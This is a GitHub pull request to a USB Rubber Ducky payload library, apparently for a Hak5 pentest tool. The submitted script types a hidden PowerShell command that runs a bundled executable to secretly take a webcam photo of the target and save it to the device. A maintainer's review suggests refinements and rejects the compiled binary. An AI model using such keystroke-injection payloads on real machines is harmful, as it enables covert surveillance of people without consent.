Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

web cam photo taker #438

Open
wants to merge 1 commit into
base: master
Choose a base branch
from
Open

web cam photo taker #438

wants to merge 1 commit into from

Conversation

ping-oui-no
Copy link

It is a script that will launch the binary, which will take a web cam photo and save it to ducky

hak5peaks
hak5peaks requested changes May 22, 2024
View reviewed changes
payloads/library/general/Web_cam_photo_taker/payload.txt
REM the ALF F4 is only if the target had autorun which will pop the Ducky folder

ATTACKMODE HID STORAGE
DELAY 5000
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Consider using EXTENSION PASSIVE_WINDOWS_DETECT the extension allows for the USB rubber ducky to detect when the target is accepting keystroke removing the need for a long start delay. Also allows you to add a guard statement to ensure the target is windows

for example

IF ($_OS != WINDOWS)
    LED_R
    STOP_PAYLOAD
END_IF

payloads/library/general/Web_cam_photo_taker/payload.txt
DELAY 2000
GUI r
DELAY 1000
STRINGLN powershell -WindowStyle Hidden Start-Process -FilePath ((Get-Volume -FileSystemLabel 'DUCKY').DriveLetter + ':\cheese.exe'); Start-Sleep -Seconds 7; taskkill /F /IM cheese.exe
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Consider using DEFINE at the start of your payload for the executable name. if the user changes cheese.exe to something different, this allows the user to easily modify the script. also adding a DEFINE for those who may not be using the default drive label of "DUCKY"

for example you can add this to the top of your payload
DEFINE #EXE_NAME cheese.exe
DEFINE #DUCKY_DRIVE_LABEL DUCKY

and modify line 14 with:

STRINGLN powershell -WindowStyle Hidden Start-Process -FilePath ((Get-Volume -FileSystemLabel '#DUCKY_DRIVE_LABEL').DriveLetter + ':\#EXE_NAME'); Start-Sleep -Seconds 7; taskkill /F /IM #EXE_NAME

payloads/library/general/Web_cam_photo_taker/README.md
@@ -0,0 +1,9 @@
## About:
* Title: Cheese
* Description: Cheese is a Rubber Ducky Script that will execute cheese.exe which will take a photo from the webcam and save it to rubber ducky.
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

While the transparency is appreciated by adding the source code, it is non trivial for an end user to verify that the exe provided is actually compiled from the source code provided; because of this, unfortunately, compiled binaries are not allowed as a matter of policy. Instead, I would recommend either adding instructions in the README on how to compile the source code provided, or find an alternative approach that uses built in utilities rather than bringing your own executable.

payloads/library/general/Web_cam_photo_taker/cheese.cs

if (usbDriveLetter == "")
{
Console.WriteLine("USB drive 'DUCKY' not found.");
Copy link
Member

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Consider not everyone's drive is named DUCKY

@hak5peaks hak5peaks added the pending requested changes requires changes before merge label May 22, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@hak5peaks hak5peaks hak5peaks requested changes

Assignees
No one assigned
Labels
pending requested changes requires changes before merge
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
2 participants
@ping-oui-no @hak5peaks